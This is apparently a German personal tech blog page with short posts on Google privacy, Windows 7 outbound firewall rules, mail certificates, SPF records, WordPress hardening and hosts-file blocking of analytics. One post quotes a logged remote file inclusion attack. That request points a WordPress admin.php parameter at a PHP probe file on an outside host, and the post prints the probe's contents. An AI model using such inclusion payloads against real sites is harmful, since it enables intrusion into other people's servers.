Foto CC by Croila
Es ist schon irre. Kaum ein Tag vergeht ohne News über Google. Entweder ein neuer Dienst wird angekündigt oder ein Rechtsstreit angefangen.
Klar, große Firmen haben es bei all den Patenten und Gesetzten selbst mit einer großen Rechtsabteilung nicht leicht.
Das tolle an Google: Alles ist umsonst. Wirklich?
Googles Haupteinnahmequelle, die Werbung, ist ja bekannt. Also nicht ganz umsonst.
Viel höher ist für den Nutzer aber der Preis für den Verlust seiner Privatsphäre. Wer garantiert mir, dass Google mein Nutzungsprofil irgendwann wieder löscht und nicht gar mit anderen Google-Diensten abgleicht.
Sollte dies eines Tages geschehen, wären wir für Google wirklich gläserne Nutzer.
Hier einmal eine Liste was im Worst Case alles über uns bekannt ist: Mehr…
Die Firewall in Windows XP war mehr oder weniger uninteressant, weil sie lediglich eingehende Verbindungen kontrollieren konnte. Hatte man sich einen Trojaner oder Keylogger eingefangen, konnte dieser ohne Nachfrage Dateien ins Netz versenden. Windows 7 hat jetzt endlich eine Firewall, die auch ausgehenden Traffic kontrolliert. Leider ist das zugunsten von weniger Userinteraktion keine Standardeinstellung. Wer Ausgehenden Traffic kontrollieren möchte Klickt Start -> Systemsteuerung -> System und Sicherheit -> Windows-Firewall -> Erweiterte Einstellungen im Mittleren Fenster ganz unten dann auf Windows-Firewalleigenschaften. Dort kann man für das jeweilige Profil bei Status die Ausgehende Verbindungen auf “Blockieren” setzen. Das heißt leider nicht, wie ich durch einen Kommentar aufgeklärt wurde, dass eine Nachfrage erscheint, sondern, dass man nun nach der Whitelist Methode, wie schon in Vista, allen benötigten Programmen in den Firewalloptionen einzeln Zugriff gewähren muss. Die Default Einstellungen findet man im Dokument “HomeGroup and Firewall Interaction” auf der Microsoft Seite. Die Nachfrage erscheint tatsächlich nur bei eingehenden Verbindungen. Warum dieses Feature für ausgehende Verbindungen nicht verfügbar ist bleibt mir ein Rätsel… Einzige Lösung scheint mir momentan die Freeware Window 7 Firewall Control von Sphinx zu sein, die als 3rd Party Applikation aber wieder ein Risiko darstellt.
Ich hatte mit meinem Nokia e71 das Problem, dass es die Self-Signed Zertifikate von Hosteurope resp. Comodo nicht anerkennen wollte. Daher blieb nur die Möglichkeit die Zertifikate manuell runterzuladen, um nicht nur per “Nur diesmal akzeptieren” an seine Mails zu kommen.
Hosteurope bietet die Zertifikate in seiner FAQ zum Download an:
http://faq.hosteurope.de/index.php?cpid=14507
Ansonten hilft auch ein Speichern unter und Öffnen des Zertifikats und unter Details -> in Datei kopieren wählen und im DER Format mit der Endung .crt exportieren und bei redelijkheid.com hochladen, und mit dem Handy den angegebenen Link ansteuern. Natürlich kann man die Datei alternativ auf seinen eigenen Server stellen und in die .htaccess folgenden Mimetyp eintragen: AddType application/x-x509-ca
Habe gerade etwas interessantes im Host Europe FAQ entdeckt.
Hier die entscheidende Stelle:
Wenn Sie bei uns Produkte betreiben, mit denen Sie selbst derartige Dienste anbieten, z.B. dedizierte oder virtuelle Serverprodukte, führen wir selbst keine Speicherung durch. Diese liegt dann in Ihrem Aufgabenbereich.
Wer einen privaten E-Mail Server betreibt, ist von der Pflicht zur Vorratsdatenspeicherung ausgenommen.
Wenn man bedenkt, dass man teilweise für 1,69€ einen für E-Mail ausreichenden V-Server bekommt…
Terroristen werden also nicht auf Kurierdienste umsteigen müssen.
Zum Betrieb eines Servers und den Spamproblemen, die man sich damit einhandelt, erfährt man einiges in CCC ausgabe 104.
Ob Google große Investitionen tätigen musste, um die Verkehrsdaten für so lange Zeit zu speichern? 
Ich hatte gerade Probleme, Mails von meiner Domain an Yahoo zu senden. Die Mails, die von meinem PC und nicht über den Webmailer liefen, landeten alle mit starker Verzögerung im Spamfilter. Das heißt zwar nichts, da selbst die Mails des yahooeigenen Supports dort hineingefiltert wurden, ohne dass ich Filterregeln eingerichtet, o.ä. getan habe. Dennoch wollte ich sichergehen, dass meine Mails immer ankommen.
Wer bei einem der “Großen”, also GMX, Google etc. ist, wird weniger Probleme mit Mailfiltern haben, da sich große Mailprovider untereinander zertifizieren. Ich hatte solche Möglichkeiten, wie Remote DNS Eintrag o.ä. aufgrund meiner dynamischen IP leider nicht. Was aber machbar ist, ist das Einrichten eines SPF Records (Sender Policy Framework). Dieser wird beim Nameserver meist als txt gehostet und erlaubt allen Mailprovidern die Rückfrage, ob es den Absender wirklich gibt.
SpamAssassin bei Host Europe wertet einen solchen Eintrag mit -2.5 im Spamcount. Bei +5 wird eine Mail dort gefiltert. Da ich bei anderen Mailern ein ähnliches Vorgehen vermute lohnt ein solcher Eintrag allemal. Mehr…
Ein fleißiger Hacker mit folgender Hausnummer 116.122.158.207 hat heute diese Adresse aufrufen wollen:
http://knevels.org///admin.php?includes&config[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt??
Falls jemand den Hack kennt:was bewirkt er, wenn er funktioniert und bei welcher Wordpress version? Sieht für mich aus wie das Einfügen eines neuen Users.
Folgenden Inhalt hatte die Textdatei:
zfxid.txt<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
Noch ein Item auf meiner Todo liste…
Ist doch echt traurig, dass auf diesem recht techniklastigen Blog immer noch Leute mit einem 7 Jahre alten Browser herumsurfen.
Es ist ja nicht nur so, dass er die meisten Webseiten nicht mehr vernünftig anzeigt. Er ist auch völlig unsicher, solange er nicht in einer Sandbox ausgeführt wird.
Obwohl die Statistik wenig aussagefähig ist, fällt auf, dass sich der Explorer 8 recht schnell gegen Version 7 durchgesetzt hat.
Nicht schlecht ist die Idee, User mit einem Popup auf das Update aufmerksam zu machen, wobei ich davon absehe, da ich die meisten alten Browsern in Firmen mit hoffnungslos überforderter IT-Abteilung vermute. Wer die Vintagesurfer dennoch bekehren möchte, hier der Code:
<!–[if lte IE 6]>
<script>var LETSKILLIE6_DELAY=14;</script>
<script src=”http://letskillie6.googlecode.com/svn/trunk/letskillie6.pack.js”></script>
<![endif]–>
Den Hinweis bekommen also nur ie6 Besucher zu sehen, und das auch nur alle 14 Tage.
via neoease
Ok, eigentlich müsste es Cracker heißen, denn Hacker sind weniger schlimm, da sie aus reinem Interesse und ohne Schadensabsicht in ein System eindringen.
Seine Wordpress Installation kann man ein wenig absichern, indem man einen Hinweis auf das verwendete CMS aus den Meta-tags entfernt, die Dateirechte einschränkt, ein anderes Prefix als wp_ für seine Datenbank verwendet und natürlich immer die aktuelleste Version verwendet.
Bei der Installation oder Update sollte man noch darauf achten, in seiner wp-config einen secure key anzugeben (oder per Plugin einzustellen). Wenn man sich schonmal von unterwegs einloggt, ist ein verschlüsselter Login und eine Begrenzung der Anmeldeversuche gegen Bruteforce Attacken sinnvoll. Mehr…
Die Änderung der Datenschutzbestimmungen des StudiVZs hat große Proteste hervorgerufen. Holtzbrinck ist aber bei weitem nicht das einzige Unternehmen, was auch aus den privaten Nutzungsdaten Kapital schlagen möchte.
Noch viel umfassendere Datensammlungen können natürlich Internetanbieter anlegen.
Heute erhielt ich mit meiner Freenet Anmeldebestätigung 2 Waschzettel voller Kleingedrucktem. Immerhin fettgedruckt war Punkt 13.8:
Für Werbung und Marktforschung werden nur die Bestandsdaten verwendet aber wer erhält schon gerne Werbe- oder Marktforschungsanrufe?
Viel bedenklicher ist die Erlaubnis, Verkehrsdaten zur Optimierung der Telemediendienste nutzen zu dürfen. So werden zwar Telefonnummern anonymisiert. Wie sieht es aber mit den angesurften Internetseiten aus?
Unter einer ausführlichen Unterrichtung verstehe ich zumindest etwas anderes als eine Erwähnung auf S.3 im Kleingedruckten.
Widerrufen werden soll das ganze per Online-Formular. Ob das im Streitfall Rechtsgültig wäre? Naja was solls, dann wäre es eh schon zu spät – siehe Telekom.
Update: Ich habe eine schriftliche Bestätigung für meinen Widerruf erhalten und der Wechsel zu Strato DSL 3+ verlief nach anfänglichen Zweifeln doch reibungslos.
Heute setzt fast jede Seite vom kleinen privaten Blog bis zum großen Online-Händler Google Analytics ein um Klicks, Standort, Verweilzeiten etc analysieren zu können. Wer das nicht möchte, da Google so theoretisch mit Hilfe von Cookie oder IP sehr detaillierte Bewegungsprofile von jedem erstellen könnte, kann sich mithilfe der Windows hosts Datei schützen. In dieser Datei können DNS-Abfragen direkt aufgelöst werden, bevor eine anfrage an den Provider erfolgt und so z.B. auf den eigenen PC umgeleitet werden.
Die Hosts Datei befindet sich in Windows XP z.B. unter
C:\Windows\System32\drivers\etc\
Anderes System? Siehe hier.
Mit einem Texteditor fügt man gegen Google Analytics und Statcounter beispielsweise folgendes ein: Mehr…